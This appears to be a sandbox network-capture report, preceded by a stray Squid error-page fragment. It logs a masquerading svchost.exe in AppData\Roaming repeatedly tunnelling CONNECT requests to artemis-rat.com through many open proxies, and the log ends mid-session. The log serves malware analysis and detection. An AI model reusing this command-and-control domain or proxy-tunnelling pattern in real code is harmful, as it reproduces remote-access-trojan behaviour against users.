<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3619	192.168.2.5	61412	194.34.232.107	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.517394066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.824050903 CET	442	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3620	192.168.2.5	61362	103.17.213.98	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.517396927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3621	192.168.2.5	61452	78.30.128.10	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.522273064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3622	192.168.2.5	61421	13.37.59.99	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.527551889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.824107885 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3623	192.168.2.5	61418	211.222.252.187	8193	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.530092955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3624	192.168.2.5	61393	92.205.110.47	14936	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.532566071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.333453894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3625	192.168.2.5	61439	46.17.63.166	16379	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.536720037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3626	192.168.2.5	61171	92.255.88.219	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.536721945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3627	192.168.2.5	61430	123.126.158.50	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.538222075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3628	192.168.2.5	61470	149.102.130.120	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.538348913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3629	192.168.2.5	61451	95.164.89.123	8888	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.538350105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3630	192.168.2.5	60202	209.126.104.38	40053	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.548465967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3631	192.168.2.5	61490	46.17.63.166	9091	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.576394081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3632	192.168.2.5	57958	59.153.158.190	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.586196899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3633	192.168.2.5	61440	103.66.177.17	32251	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.586426020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3634	192.168.2.5	61475	8.219.177.134	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.594959021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3635	192.168.2.5	60980	138.36.150.15	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.617461920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3636	192.168.2.5	60362	27.65.114.8	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.618282080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3637	192.168.2.5	61494	86.8.163.88	9150	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.626183033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3638	192.168.2.5	61499	128.140.26.12	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.626247883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.934976101 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.25.2 Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3639	192.168.2.5	61502	193.239.58.92	8081	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.626938105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3640	192.168.2.5	61547	104.16.104.12	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.647716045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.802879095 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3641	192.168.2.5	61554	104.25.167.88	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.655776024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.810260057 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3642	192.168.2.5	60977	203.222.24.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.660252094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.146055937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.646651983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3643	192.168.2.5	60277	51.77.222.4	8118	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.672772884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.583930016 CET	131	IN	HTTP/1.1 503 Too many open connections Content-Type: text/plain Connection: close Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a Data Ascii: Maximum number of open connections reached.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3644	192.168.2.5	61539	94.131.63.120	58378	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.680196047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3645	192.168.2.5	61506	185.101.16.52	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.684370995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3646	192.168.2.5	58055	62.152.53.186	8909	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.689800978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3647	192.168.2.5	58322	181.129.62.2	47377	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.694247007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3648	192.168.2.5	61581	172.67.181.20	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.699748039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.857387066 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3649	192.168.2.5	61587	185.162.228.154	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.708992004 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.865976095 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3650	192.168.2.5	61594	104.25.64.27	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.721111059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.875179052 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3651	192.168.2.5	61610	104.22.50.220	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.745198965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.899760962 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3652	192.168.2.5	61524	201.13.147.161	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
